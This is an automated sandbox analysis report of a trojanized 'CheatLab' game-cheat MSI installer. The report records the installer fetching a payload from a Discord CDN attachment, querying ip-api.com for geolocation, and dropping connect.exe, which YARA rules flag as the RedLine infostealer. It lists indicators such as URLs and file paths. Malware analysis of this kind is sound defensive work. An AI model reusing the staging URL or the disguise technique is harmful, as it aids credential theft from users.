          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://tl.symcd.com0&
          Source: Amcache.hve.25.drString found in binary or memory: http://upx.sf.net
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: NzEx.exe.11.drString found in binary or memory: https://luajit.org/
          Source: connect.exe.11.drString found in binary or memory: https://sectigo.com/CPS0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
          Source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
          Source: unknownDNS traffic detected: queries for: ip-api.com
          Source: global trafficHTTP traffic detected: GET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1User-Agent: SunCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=kCi2GYOZeYHyA10sUg_bOGn89f2AWCraeEUmTMI9E1Y-1699057815-0-Ae7NdqYh6y4Vn05KJQP1pqOYfL0VjeRaSbco9oI2dfRUDSdYbfh+TLhUFMMvRdmJhd3Po/8vja/n0aNCiZvYc6w=; _cfuvid=s5rVrnaiMIWihEPRd4K_XSgaFFGJdcRN_pQvtzzHOtQ-1699057815839-0-604800000
          Source: global trafficHTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: SunHost: ip-api.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1Content-Type: application/jsonUser-Agent: SunHost: cdn.discordapp.comCache-Control: no-cache
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49716 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 21.2.connect.exe.20b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 21.2.connect.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Drops large PE files
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile dump: connect.exe.11.dr 1070058901Jump to dropped file
          Source: 21.2.connect.exe.20b0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 21.2.connect.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 840
          Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI7AF2.tmpJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\51799a.msiJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A46A506_2_00A46A50
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A7F0326_2_00A7F032
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A792A96_2_00A792A9
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A6C2CA6_2_00A6C2CA
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A6E2706_2_00A6E270
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A784BD6_2_00A784BD
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A6A5876_2_00A6A587
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A7D8D56_2_00A7D8D5
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A4C8706_2_00A4C870
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A649206_2_00A64920
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A6A9156_2_00A6A915
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A70A486_2_00A70A48
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A49CC06_2_00A49CC0
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A75D6D6_2_00A75D6D
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AE8CA4017_2_00007FF73AE8CA40
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF27C7C17_2_00007FF73AF27C7C
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEE9B6017_2_00007FF73AEE9B60
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AE91B5017_2_00007FF73AE91B50
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF27B6017_2_00007FF73AF27B60
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEB3C6017_2_00007FF73AEB3C60
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF4BBD817_2_00007FF73AF4BBD8
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF17BF417_2_00007FF73AF17BF4
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AE7BC3017_2_00007FF73AE7BC30
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF27A4017_2_00007FF73AF27A40
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF2792417_2_00007FF73AF27924
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEBBAD017_2_00007FF73AEBBAD0
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF1797017_2_00007FF73AF17970
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AE7BA9017_2_00007FF73AE7BA90
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEEC00017_2_00007FF73AEEC000
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF180F817_2_00007FF73AF180F8
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF3FF7017_2_00007FF73AF3FF70
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF17E9017_2_00007FF73AF17E90
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF2B44817_2_00007FF73AF2B448
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEC118017_2_00007FF73AEC1180
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF0516017_2_00007FF73AF05160
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF2518417_2_00007FF73AF25184
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF431F417_2_00007FF73AF431F4
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF2B8FC17_2_00007FF73AF2B8FC
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF0991017_2_00007FF73AF09910
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF3574017_2_00007FF73AF35740
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF4175C17_2_00007FF73AF4175C
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF3B6BC17_2_00007FF73AF3B6BC
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEBD6B017_2_00007FF73AEBD6B0
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF355C417_2_00007FF73AF355C4
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEDF65017_2_00007FF73AEDF650
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AE86BC017_2_00007FF73AE86BC0
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF42C7417_2_00007FF73AF42C74
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF24C8417_2_00007FF73AF24C84
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF3ACB017_2_00007FF73AF3ACB0
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF18C1417_2_00007FF73AF18C14
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AE86A0017_2_00007FF73AE86A00
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF0AB0017_2_00007FF73AF0AB00
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF1894817_2_00007FF73AF18948
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF429E017_2_00007FF73AF429E0
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF2708017_2_00007FF73AF27080
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF36FC417_2_00007FF73AF36FC4
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEEAD6017_2_00007FF73AEEAD60
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF1CD1C17_2_00007FF73AF1CD1C
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF3C47C17_2_00007FF73AF3C47C
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF1C4CC17_2_00007FF73AF1C4CC
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF304E817_2_00007FF73AF304E8
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF1837417_2_00007FF73AF18374
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF382B017_2_00007FF73AF382B0
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEB229017_2_00007FF73AEB2290
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF3482817_2_00007FF73AF34828
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF428FC17_2_00007FF73AF428FC
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEC287E17_2_00007FF73AEC287E
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF1865417_2_00007FF73AF18654
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF0453017_2_00007FF73AF04530
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E0CA4018_2_00007FF7B1E0CA40
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EC31F418_2_00007FF7B1EC31F4
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EA518418_2_00007FF7B1EA5184
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E4118018_2_00007FF7B1E41180
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E8516018_2_00007FF7B1E85160
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EAB44818_2_00007FF7B1EAB448
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EBB6BC18_2_00007FF7B1EBB6BC
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E3D6B018_2_00007FF7B1E3D6B0
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E5F65018_2_00007FF7B1E5F650
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EB55C418_2_00007FF7B1EB55C4
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E8991018_2_00007FF7B1E89910
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EAB8FC18_2_00007FF7B1EAB8FC
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EC175C18_2_00007FF7B1EC175C
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EB574018_2_00007FF7B1EB5740
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E3BAD018_2_00007FF7B1E3BAD0
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1DFBA9018_2_00007FF7B1DFBA90
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EA7A4018_2_00007FF7B1EA7A40
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E9797018_2_00007FF7B1E97970
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EA792418_2_00007FF7B1EA7924
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EA7C7C18_2_00007FF7B1EA7C7C
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E33C6018_2_00007FF7B1E33C60
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1DFBC3018_2_00007FF7B1DFBC30
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E97BF418_2_00007FF7B1E97BF4
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1ECBBD818_2_00007FF7B1ECBBD8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EA7B6018_2_00007FF7B1EA7B60
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E69B6018_2_00007FF7B1E69B60
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E11B5018_2_00007FF7B1E11B50
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E97E9018_2_00007FF7B1E97E90
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E980F818_2_00007FF7B1E980F8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E6C00018_2_00007FF7B1E6C000
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EBFF7018_2_00007FF7B1EBFF70
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EB82B018_2_00007FF7B1EB82B0
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E3229018_2_00007FF7B1E32290
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EB04E818_2_00007FF7B1EB04E8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E9C4CC18_2_00007FF7B1E9C4CC
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EBC47C18_2_00007FF7B1EBC47C
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E9837418_2_00007FF7B1E98374
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E9865418_2_00007FF7B1E98654
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E8453018_2_00007FF7B1E84530
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EC28FC18_2_00007FF7B1EC28FC
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E4287E18_2_00007FF7B1E4287E
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EB482818_2_00007FF7B1EB4828
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E8AB0018_2_00007FF7B1E8AB00
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E06A0018_2_00007FF7B1E06A00
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EC29E018_2_00007FF7B1EC29E0
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E9894818_2_00007FF7B1E98948
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EBACB018_2_00007FF7B1EBACB0
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EA4C8418_2_00007FF7B1EA4C84
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EC2C7418_2_00007FF7B1EC2C74
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E98C1418_2_00007FF7B1E98C14
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E06BC018_2_00007FF7B1E06BC0
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E6AD6018_2_00007FF7B1E6AD60
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E9CD1C18_2_00007FF7B1E9CD1C
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EA708018_2_00007FF7B1EA7080
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EB6FC418_2_00007FF7B1EB6FC4
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040205021_2_00402050
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040987721_2_00409877
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040909721_2_00409097
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_004189C521_2_004189C5
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040225021_2_00402250
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_00419B4521_2_00419B45
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040A33021_2_0040A330
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_00408BC221_2_00408BC2
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0041ABF121_2_0041ABF1
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0041944D21_2_0041944D
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040946B21_2_0040946B
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_00409C9721_2_00409C97
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040F75621_2_0040F756
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_00418F0921_2_00418F09
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 0040FD1C appears 48 times
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 004024E0 appears 67 times
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: String function: 00A63292 appears 70 times
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: String function: 00A63790 appears 39 times
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: String function: 00A6325F appears 103 times
          Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameviewer.exeF vs Cheat.Lab.2.7.1.msi
